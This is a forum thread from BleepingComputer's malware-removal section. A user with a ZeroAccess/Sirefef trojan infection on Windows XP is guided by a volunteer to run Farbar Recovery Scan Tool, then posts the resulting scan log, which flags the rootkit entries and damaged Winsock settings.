Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Threat found! a variant of Sirefef.GC trojan


  • This topic is locked This topic is locked
25 replies to this topic

#1 trussardi15

trussardi15

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:02:58 PM

Posted 29 May 2014 - 09:06 AM

Hello Master and Sensei! I need some help!

 

First of my pc start showing some erorrs like dll...not a valid windows image every time i opened a program.

Second, my Avira report a threat that called zeroaccess if i am not mistaken, even though i tried to remove and close it, it keeps showing up.

And then, I tried to install Eset smart security to replace my Avira, and now ESS showing at least 90 notification about a threat like this:

 

Threat found!!

Object: Operating memory >> services.exe(884)

Threat: a variant of Win32/Sirefef.GC trojan

Information: cleaned by deleting-quarantined.

 

I already read the same topic about this and try to do the same instructions but I am afraid that I will make some mistakes so I write my own topic about this.

Your help is very meaningful to me.

Thanks

Best Regards

Aiven


Edited by trussardi15, 29 May 2014 - 09:07 AM.


BC AdBot (Login to Remove)

 


#2 Bud_91

Bud_91

  • Malware Response Team
  • 438 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:58 AM

Posted 29 May 2014 - 09:52 AM

Hello and welcome to Bleeping Computer. I am sorry that you are having troubles with your computer and will try my best to help you. I know that being infected is very frustrating, but I will be here to help you through the whole process of cleaning. Removing malware can be difficult and complicated and will most likely take many steps, so please stick with me until I have declared your computer clean. I always recommend printing my instructions before following them in case you cannot keep this webpage open. Please be sure to alway follow all steps exactly as they are written and let me know what happens each time. Stop and ask if something unexpected happens or if you are unsure of how to proceed.
 
Please respect my volunteered time and stay with me until I declare your computer clean. If you are going to be delayed for a while, please let me know.
 
Can you get this scan to run? If not, let me know and we will try another method.
 

Please download Farbar Recovery Scan Tool and save it to your desktop.
 
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.
  •  


    If I have not responded to your log in 36 hours, feel free to send me a PM.

    If you would like to make a thank-you donation, please click here: btn_donate_SM.png

     

    A.K.A. Buddierdl @ GeeksToGo.com


    #3 trussardi15

    trussardi15
    • Topic Starter

    • Members
    • 13 posts
    • OFFLINE
    •  
    • Local time:02:58 PM

    Posted 29 May 2014 - 07:49 PM

    Hello bud! Thanks for your reply and help!

    Okay I already scan it. When you said I need to attach it, do you mean I need to copy paste it in here, or I just simply attach it?

     

    Thanks

    Best Regards

    Aiven



    #4 Bud_91

    Bud_91

    • Malware Response Team
    • 438 posts
    • OFFLINE
    •  
    • Gender:Male
    • Local time:03:58 AM

    Posted 29 May 2014 - 09:06 PM

    Please copy/paste the log. :)


    If I have not responded to your log in 36 hours, feel free to send me a PM.

    If you would like to make a thank-you donation, please click here: btn_donate_SM.png

     

    A.K.A. Buddierdl @ GeeksToGo.com


    #5 trussardi15

    trussardi15
    • Topic Starter

    • Members
    • 13 posts
    • OFFLINE
    •  
    • Local time:02:58 PM

    Posted 29 May 2014 - 09:34 PM

    Hello. Here is the log.

     

    Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:30-05-2014
    Ran by Gery (administrator) on HOMESWEETHOME on 30-05-2014 09:19:36
    Running from C:\Documents and Settings\Gery\Desktop
    Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: English(US)
    Internet Explorer Version 8
    Boot Mode: Normal
     
    The only official download link for FRST:
    Download link from any site other than Bleeping Computer is unpermitted or outdated.
     
    ==================== Processes (Whitelisted) =================
     
    (ATI Technologies Inc.) C:\WINDOWS\system32\ati2evxx.exe
    (The Within Network, LLC) C:\WINDOWS\UnsignedThemesSvc.exe
    (ATI Technologies Inc.) C:\WINDOWS\system32\ati2evxx.exe
    (ESET) C:\Program Files\ESET\ESET Smart Security\ekrn.exe
    (Oracle Corporation) C:\Program Files\Java\jre7\bin\jqs.exe
    (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
    (Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
    (NCSOFT Corporation) C:\Program Files\NCWest\NCLauncher\NCUpdateHelper.exe
    (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
    (Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
    (ESET) C:\Program Files\ESET\ESET Smart Security\egui.exe
    (Microsoft Corporation) C:\WINDOWS\system32\conime.exe
    () D:\Games\GARENA HON\GameData\GarenaMessenger.exe
    (LINE Corporation) C:\Program Files\Naver\LINE\Line.exe
    (BitTorrent Inc.) C:\Documents and Settings\Gery\Application Data\uTorrent\uTorrent.exe
    (Tonec Inc.) C:\Program Files\Internet Download Manager\IDMan.exe
    (Yahoo! Inc.) C:\PROGRA~1\Yahoo!\MESSEN~1\Ymsgr_tray.exe
    (ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
    (Tonec Inc.) C:\Program Files\Internet Download Manager\IEMonitor.exe
    (Google Inc.) C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
    (腾讯计算机系统有限公司) D:\Games\BNS\£áé_ìú\剑灵_腾讯\TCLS\Launcher.exe
    () D:\Games\BNS\£áé_ìú\剑灵_腾讯\TCLS\TenProtect\TenSafe_1.exe
     
     
    ==================== Registry (Whitelisted) ==================
     
    HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2011-12-05] (Advanced Micro Devices, Inc.)
    HKLM\...\Run: [NCUpdateHelper] => C:\Program Files\NCWest\NCLauncher\NCUpdateHelper.exe [528360 2013-08-25] (NCSOFT Corporation)
    HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
    HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-12-21] (Adobe Systems Incorporated)
    HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET Smart Security\egui.exe [5075104 2014-02-24] (ESET)
    HKLM\...\runonceex: [TITLE] - Set Up Software
    Winlogon\Notify\AtiExtEvent: C:\WINDOWS\system32\Ati2evxx.dll (ATI Technologies Inc.)
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Run: [Google Update] => C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [116648 2012-08-14] (Google Inc.)
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Run: [Messenger (Yahoo!)] => C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe [6595928 2012-05-25] (Yahoo! Inc.)
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Run: [GarenaPlus] => D:\Games\GARENA HON\GameData\GarenaMessenger.exe [9936176 2014-04-29] ()
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Run: [Steam] => C:\Program Files\Steam\steam.exe [1775808 2014-05-28] (Valve Corporation)
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Run: [Line] => C:\Program Files\Naver\LINE\Line.exe [3948904 2014-04-29] (LINE Corporation)
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Run: [Google Update*] => [X] <===== ATTENTION (ZeroAccess rootkit hidden path)
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Run: [uTorrent] => C:\Documents and Settings\Gery\Application Data\uTorrent\uTorrent.exe [1272400 2014-05-15] (BitTorrent Inc.)
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Run: [IDMan] => C:\Program Files\Internet Download Manager\IDMan.exe [3821136 2013-11-30] (Tonec Inc.)
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Policies\Explorer\Run: [FLT] => C:\Documents and Settings\Gery\Application Data\4102C4\4102C4.exe [32768 2008-04-14] (Microsoft Corporation)
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\MountPoints2: {b44f8ed2-0b10-11e2-99cb-001cc09e9dd6} - I:\.\autorun.exe
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\MountPoints2: {ff40af84-12dc-11e3-9b09-001cc09e9dd6} - H:\setup.exe
     
    ==================== Internet (Whitelisted) ====================
     
    HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://id.rd.yahoo.com/customize/ycomp/defaults/sp/*http://id.yahoo.com
    SearchScopes: HKCU - DefaultScope {09E8BE24-9549-4608-B858-3B97D77AC1BC} URL = http://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=b1ie7
    SearchScopes: HKCU - {09E8BE24-9549-4608-B858-3B97D77AC1BC} URL = http://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=b1ie7
    BHO: IDM integration (IDMIEHlprObj Class) - {0055C089-8582-441B-A0BF-17B458C2A3A8} - C:\Program Files\Internet Download Manager\IDMIECC.dll (Internet Download Manager, Tonec Inc.)
    BHO: No Name - {02478D38-C3F9-4efb-9B51-7695ECA05670} -  No File
    BHO: Java™ Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
    BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
    BHO: Java™ Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
    Toolbar: HKCU - &Address - {01E04581-4EEE-11D0-BFE9-00AA005B4383} - C:\WINDOWS\system32\browseui.dll (Microsoft Corporation)
    Toolbar: HKCU - &Links - {0E5CBF21-D15F-11D0-8301-00AA005B4383} - C:\WINDOWS\system32\SHELL32.dll (Microsoft Corporation)
    Winsock: Catalog5 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
    Winsock: Catalog5 03 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
    Winsock: Catalog9 01 mswsock.dll File Not found ()
    Winsock: Catalog9 02 mswsock.dll File Not found ()
    Winsock: Catalog9 03 mswsock.dll File Not found ()
    Winsock: Catalog9 04 mswsock.dll File Not found ()
    Winsock: Catalog9 05 mswsock.dll File Not found ()
    Winsock: Catalog9 06 mswsock.dll File Not found ()
    Winsock: Catalog9 07 mswsock.dll File Not found ()
    Winsock: Catalog9 08 mswsock.dll File Not found ()
    Winsock: Catalog9 09 mswsock.dll File Not found ()
    Winsock: Catalog9 10 mswsock.dll File Not found ()
    Winsock: Catalog9 11 mswsock.dll File Not found ()
    Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
    Tcpip\..\Interfaces\{92FC92ED-CF99-4401-B1B9-D8CAB595F2D5}: [NameServer]8.8.8.8,8.8.4.4
     
    FireFox:
    ========
    FF ProfilePath: C:\Documents and Settings\Gery\Application Data\Mozilla\Firefox\Profiles\3s30ge9d.default
    FF Plugin: @adobe.com/FlashPlayer - C:\WINDOWS\system32\Macromed\Flash\NPSWF32_13_0_0_214.dll ()
    FF Plugin: @java.com/DTPlugin,version=10.51.2 - C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
    FF Plugin: @java.com/JavaPlugin,version=10.51.2 - C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
    FF Plugin: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 - C:\Program Files\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
    FF Plugin: @microsoft.com/WPF,version=3.5 - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
    FF Plugin: @qq.com/TXSSO - C:\Program Files\Common Files\Tencent\TXSSO\1.2.1.89\Bin\npSSOAxCtrlForPTLogin.dll (Tencent)
    FF Plugin: @t.garena.com/garenatalk - D:\Games\GARENA HON\GameData\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll ( Garena)
    FF Plugin: @videolan.org/vlc,version=2.0.0 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
    FF Plugin: @videolan.org/vlc,version=2.1.3 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
    FF Plugin: Adobe Reader - C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
    FF Plugin HKCU: @tools.google.com/Google Update;version=3 - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
    FF Plugin HKCU: @tools.google.com/Google Update;version=9 - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
    FF Plugin HKCU: @unity3d.com/UnityPlayer,version=1.0 - C:\Documents and Settings\Gery\Local Settings\Application Data\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
    FF user.js: detected! => C:\Documents and Settings\Gery\Application Data\Mozilla\Firefox\Profiles\3s30ge9d.default\user.js
    FF Extension: Bruowsee2save - C:\Documents and Settings\Gery\Application Data\Mozilla\Firefox\Profiles\3s30ge9d.default\Extensions\joiqeii@whth.co.uk [2013-04-01]
    FF Extension: Yahoo! Toolbar - C:\Documents and Settings\Gery\Application Data\Mozilla\Firefox\Profiles\3s30ge9d.default\Extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1} [2014-04-04]
    FF Extension: Cookies Manager+ - C:\Documents and Settings\Gery\Application Data\Mozilla\Firefox\Profiles\3s30ge9d.default\Extensions\{bb6bc1bb-f824-4702-90cd-35e2fb24f25d} [2013-08-09]
    FF Extension: Charles Autoconfiguration - C:\Documents and Settings\Gery\Application Data\Mozilla\Firefox\Profiles\3s30ge9d.default\Extensions\{3e9a3920-1b27-11da-8cd6-0800200c9a66}.xpi [2012-11-19]
    FF HKLM\...\Firefox\Extensions: [OKitSpace@Vittalia.es] - C:\Documents and Settings\Gery\Application Data\okitspace\Firefox
    FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\
    FF Extension: Microsoft .NET Framework Assistant - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\ []
    FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird
    FF Extension: ESET Smart Security Extension - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird [2014-05-29]
    FF HKCU\...\Firefox\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Documents and Settings\Gery\Application Data\IDM\idmmzcc5
    FF Extension: IDM CC - C:\Documents and Settings\Gery\Application Data\IDM\idmmzcc5 [2014-05-03]
    FF HKCU\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Documents and Settings\Gery\Application Data\IDM\idmmzcc5
    FF Extension: IDM CC - C:\Documents and Settings\Gery\Application Data\IDM\idmmzcc5 [2014-05-03]
     
    Chrome: 
    =======
    CHR HomePage: hxxp://www2.delta-search.com/?babsrc=HP_ss&mntrId=C441001CC09E9DD6&affID=124741&tsp=5010
    CHR StartupUrls: "hxxp://www.google.com/"
    CHR Plugin: (Shockwave Flash) - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\Application\35.0.1916.114\PepperFlash\pepflashplayer.dll ()
    CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
    CHR Plugin: (Native Client) - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\Application\35.0.1916.114\ppGoogleNaClPluginChrome.dll ()
    CHR Plugin: (Chrome PDF Viewer) - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\Application\35.0.1916.114\pdf.dll ()
    CHR Plugin: (Microsoft DRM) - C:\Program Files\Windows Media Player\npdrmv2.dll (Microsoft Corporation)
    CHR Plugin: (Windows Media Player Plug-in Dynamic Link Library) - C:\Program Files\Windows Media Player\npdsplay.dll (Microsoft Corporation (written by Digital Renaissance Inc.))
    CHR Plugin: (Microsoft DRM) - C:\Program Files\Windows Media Player\npwmsdrm.dll (Microsoft Corporation)
    CHR Plugin: (Google Update) - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
    CHR Plugin: (Java™ Platform SE 7 U7) - C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
    CHR Plugin: (VLC Web Plugin) - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
    CHR Plugin: (Shockwave Flash) - C:\WINDOWS\system32\Macromed\Flash\NPSWF32_11_6_602_180.dll No File
    CHR Plugin: (Java Deployment Toolkit 7.0.70.10) - C:\WINDOWS\system32\npDeployJava1.dll No File
    CHR Plugin: (Garena Talk Plugin) - D:\Games\GARENA HON\GameData\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll ( Garena)
    CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-23]
    CHR Extension: (Google Search) - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-06-13]
    CHR Extension: (IDM Integration Module) - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jeaohhlajejodfjadcponpnjgkiikocn [2014-05-03]
    CHR Extension: (AsunaxKuroyukihime) - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nedobobpfkomoelpnhlkmnfpghbnecge [2013-06-13]
    CHR Extension: (Google Wallet) - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22]
    CHR HKLM\...\Chrome\Extension: [jeaohhlajejodfjadcponpnjgkiikocn] - C:\Program Files\Internet Download Manager\IDMGCExt.crx [2013-11-29]
    CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
     
    ========================== Services (Whitelisted) =================
     
    R2 ekrn; C:\Program Files\ESET\ESET Smart Security\ekrn.exe [1343408 2014-02-24] (ESET)
    R2 JavaQuickStarterService; C:\Program Files\Java\jre7\bin\jqs.exe [182696 2013-12-18] (Oracle Corporation)
    R3 Nla; C:\WINDOWS\System32\mswsock.dll [245248 2008-04-14] ()
    S3 npggsvc; C:\WINDOWS\system32\GameMon.des [5110192 2012-10-31] (INCA Internet Co., Ltd.)
    R2 UnsignedThemes; C:\WINDOWS\UnsignedThemesSvc.exe [21096 2009-07-13] (The Within Network, LLC)
    S2 Update sizlsearch; "C:\Program Files\sizlsearch\updatesizlsearch.exe" [X]
    S2 Util sizlsearch; "C:\Program Files\sizlsearch\bin\utilsizlsearch.exe" [X]
    S2 *etadpug; "C:\Program Files\Google\Desktop\Install\{5be576b1-8633-ed43-6e4f-980ec4dd552d}\   \   \???\{5be576b1-8633-ed43-6e4f-980ec4dd552d}\GoogleUpdate.exe" < <==== ATTENTION (ZeroAccess)
     
    ==================== Drivers (Whitelisted) ====================
     
    S3 1394hub; C:\WINDOWS\System32\svchost.exe [14336 2008-04-14] (Microsoft Corporation)
    S3 Ambfilt; C:\WINDOWS\System32\drivers\Ambfilt.sys [1691480 2009-11-18] (Creative)
    S3 apf003; C:\WINDOWS\system32\apf003.sys [13232 2013-01-24] ()
    R3 AtiHDAudioService; C:\WINDOWS\System32\drivers\AtihdXP3.sys [100368 2011-12-20] (Advanced Micro Devices)
    R0 Bhbase; C:\WINDOWS\System32\drivers\Bhbase.sys [47456 2013-09-03] (Baidu, Inc.)
    R1 eamon; C:\WINDOWS\System32\DRIVERS\eamon.sys [184664 2013-09-17] (ESET)
    R1 ehdrv; C:\WINDOWS\System32\DRIVERS\ehdrv.sys [134248 2013-09-17] (ESET)
    R1 ElbyCDIO; C:\WINDOWS\System32\Drivers\ElbyCDIO.sys [26024 2009-12-18] (Elaborate Bytes AG)
    R2 epfw; C:\WINDOWS\System32\DRIVERS\epfw.sys [174400 2013-09-17] (ESET)
    R3 Epfwndis; C:\WINDOWS\System32\DRIVERS\Epfwndis.sys [38952 2013-09-17] (ESET)
    R1 epfwtdi; C:\WINDOWS\System32\DRIVERS\epfwtdi.sys [61600 2013-09-17] (ESET)
    R1 FsVga; C:\WINDOWS\System32\DRIVERS\fsvga.sys [12160 2007-07-29] (Microsoft Corporation)
    R1 IDMTDI; C:\WINDOWS\System32\DRIVERS\idmtdi.sys [121184 2013-11-28] (Tonec Inc.)
    S3 Monfilt; C:\WINDOWS\System32\drivers\Monfilt.sys [1395800 2009-11-18] (Creative Technology Ltd.)
    S3 pwdrvio; C:\WINDOWS\system32\pwdrvio.sys [15576 2012-06-18] ()
    S3 pwdspio; C:\WINDOWS\system32\pwdspio.sys [10200 2012-06-18] ()
    R0 SmartDefragDriver; C:\WINDOWS\System32\Drivers\SmartDefragDriver.sys [14776 2010-11-26] ()
    S3 TesSafe; C:\WINDOWS\system32\TesSafe.sys [931640 2014-05-30] (TENCENT)
    S3 tmusbnet; C:\WINDOWS\System32\DRIVERS\tmusbnet.sys [109568 2010-04-20] (QUALCOMM Incorporated)
    R2 uxpatch; C:\WINDOWS\system32\drivers\uxpatch.sys [25448 2009-07-13] ()
    R1 {9d5747ee-0448-4681-8337-1555de75a3b6}Gt; C:\WINDOWS\System32\drivers\{9d5747ee-0448-4681-8337-1555de75a3b6}Gt.sys [55232 2014-05-06] (StdLib)
    S3 BprotectEx; \??\C:\WINDOWS\System32\drivers\BprotectEx.sys [X]
    S3 EagleNT; \??\C:\DOCUME~1\Gery\LOCALS~1\Temp\EagleNT.sys [X]
    S3 EagleXNt; \??\C:\WINDOWS\system32\drivers\EagleXNt.sys [X]
    S3 GGSAFERDriver; \??\D:\Games\GARENA HON\GameData\Room\safedrv.sys [X]
    S4 IntelIde; No ImagePath
    S3 PCFApiUtil; \??\C:\Program Files\Baidu Security\PC Faster\3.7.0.0\PCFApiUtil.sys [X]
    S3 tmnsusbser; system32\DRIVERS\tmnsusbser.sys [X]
    S3 XDva401; \??\C:\WINDOWS\system32\XDva401.sys [X]
    S3 xhunter1; \??\C:\WINDOWS\xhunter1.sys [X]
     
    ==================== NetSvcs (Whitelisted) ===================
     
     
    ==================== One Month Created Files and Folders ========
     
    2014-05-30 07:45 - 2014-05-30 07:45 - 00000000 ____D () C:\Documents and Settings\NetworkService\Local Settings\Application Data\ESET
    2014-05-30 07:29 - 2014-05-30 09:19 - 00017945 _____ () C:\Documents and Settings\Gery\Desktop\FRST.txt
    2014-05-30 07:29 - 2014-05-30 09:19 - 00000000 ____D () C:\FRST
    2014-05-30 07:28 - 2014-05-30 07:28 - 01056256 _____ (Farbar) C:\Documents and Settings\Gery\Desktop\FRST.exe
    2014-05-29 21:00 - 2014-05-29 21:01 - 00688992 _____ (Swearware) C:\Documents and Settings\Gery\Desktop\dds.com
    2014-05-29 19:32 - 2014-05-29 19:32 - 00000000 ____D () C:\Documents and Settings\Gery\Local Settings\Application Data\ESET
    2014-05-29 19:32 - 2014-05-29 19:32 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\ESET
    2014-05-29 19:31 - 2014-05-29 19:31 - 00000000 ____D () C:\Documents and Settings\LocalService\Local Settings\Application Data\ESET
    2014-05-29 19:30 - 2014-05-30 07:45 - 00000000 ____D () C:\WINDOWS\LastGood.Tmp
    2014-05-29 19:30 - 2014-05-29 19:41 - 00005809 _____ () C:\WINDOWS\setupapi.log
    2014-05-29 19:28 - 2014-05-29 19:28 - 00000000 ____D () C:\Program Files\ESET
    2014-05-29 19:28 - 2014-05-29 19:28 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\ESET
    2014-05-29 19:28 - 2014-05-29 19:28 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\ESET
    2014-05-29 13:00 - 2014-05-29 17:54 - 00000600 _____ () C:\Documents and Settings\Gery\Local Settings\Application Data\PUTTY.RND
    2014-05-28 22:03 - 2014-05-28 22:03 - 00329096 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
    2014-05-28 17:31 - 2014-05-30 07:43 - 00000241 _____ () C:\WINDOWS\WindowsUpdate.log
    2014-05-28 16:31 - 2013-10-05 00:29 - 00421744 _____ (Network Tunnel Lab) C:\WINDOWS\system32\networkdlllsp.dll
    2014-05-28 16:08 - 2014-05-30 08:56 - 00000000 __SHD () C:\Documents and Settings\Gery\wc
    2014-05-28 16:08 - 2014-05-29 16:08 - 00000000 __SHD () C:\Documents and Settings\Gery\Application Data\wyUpdate AU
    2014-05-28 16:08 - 2014-05-28 17:24 - 00000000 __SHD () C:\Documents and Settings\Gery\Local Settings\Application Data\icsxml
    2014-05-28 16:08 - 2014-05-28 16:08 - 00088336 _____ () C:\Documents and Settings\Gery\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
    2014-05-28 16:08 - 2014-05-28 16:08 - 00000038 ___SH () C:\Documents and Settings\Gery\Local Settings\Application Data\1754111884ee9ab5277ca00.95260103
    2014-05-28 16:08 - 2014-05-28 16:08 - 00000000 ____D () C:\Documents and Settings\Gery\Local Settings\Application Data\BattlePing
    2014-05-28 16:07 - 2014-05-28 16:07 - 00000712 _____ () C:\Documents and Settings\All Users\Desktop\BattlePing.lnk
    2014-05-28 16:07 - 2014-05-28 16:07 - 00000000 ____D () C:\Program Files\BattlePing
    2014-05-28 16:07 - 2014-05-28 16:07 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\BattlePing
    2014-05-27 17:20 - 2014-05-29 16:07 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\腾讯软件
    2014-05-27 17:19 - 2014-05-27 17:19 - 00000000 ____D () C:\Program Files\Tencent
    2014-05-22 11:35 - 2014-05-06 16:40 - 00055232 _____ (StdLib) C:\WINDOWS\system32\Drivers\{9d5747ee-0448-4681-8337-1555de75a3b6}Gt.sys
    2014-05-22 10:04 - 2014-05-28 22:03 - 00000000 ____D () C:\Program Files\sizlsearch
    2014-05-16 15:59 - 2014-05-16 15:59 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\17173
    2014-05-16 09:41 - 2014-05-16 09:41 - 00000000 ____D () C:\WINDOWS\system32\mssymbols
    2014-05-15 21:58 - 2014-05-15 21:58 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\LokiReborn
    2014-05-15 21:56 - 2014-05-29 17:48 - 00002175 _____ () C:\Documents and Settings\All Users\Desktop\China English Patch.lnk
    2014-05-15 20:37 - 2014-05-15 20:37 - 00000732 _____ () C:\Documents and Settings\Gery\Desktop\剑灵_腾讯.lnk
    2014-05-15 20:37 - 2014-05-15 20:37 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\腾讯游戏
    2014-05-15 18:47 - 2014-05-15 18:47 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\Microsoft AppLocale
    2014-05-15 17:51 - 2014-05-27 17:20 - 00000000 ____D () C:\Program Files\Common Files\Tencent
    2014-05-15 17:01 - 2014-05-15 17:01 - 00000000 ____D () C:\Documents and Settings\All Users\Tencent
    2014-05-15 17:00 - 2014-05-29 18:07 - 00000040 _____ () C:\Documents and Settings\All Users\Application Data\DT0001.dat
    2014-05-15 16:45 - 2014-05-29 18:06 - 00000040 _____ () C:\Documents and Settings\All Users\Application Data\DT0006.dat
    2014-05-15 16:33 - 2014-05-15 16:33 - 00000000 ____D () C:\WINDOWS\Minidump
    2014-05-15 14:52 - 2014-05-29 16:07 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\Tencent
    2014-05-15 14:52 - 2014-05-27 17:39 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Tencent
    2014-05-15 14:51 - 2014-05-15 14:51 - 00000000 ____D () C:\Documents and Settings\Gery\My Documents\BnS
    2014-05-15 14:50 - 2014-05-30 09:17 - 00931640 _____ (TENCENT) C:\WINDOWS\system32\TesSafe.sys
    2014-05-15 14:36 - 2014-05-15 14:39 - 00000000 ____D () C:\Documents and Settings\Gery\Local Settings\Application Data\Downloaded Installations
    2014-05-15 14:36 - 2014-05-15 14:36 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\ÌÚѶÓÎÏ·
    2014-05-15 12:51 - 2014-05-15 12:51 - 00000831 _____ () C:\Documents and Settings\Gery\Start Menu\µTorrent.lnk
    2014-05-03 18:36 - 2014-05-09 23:04 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\IDM
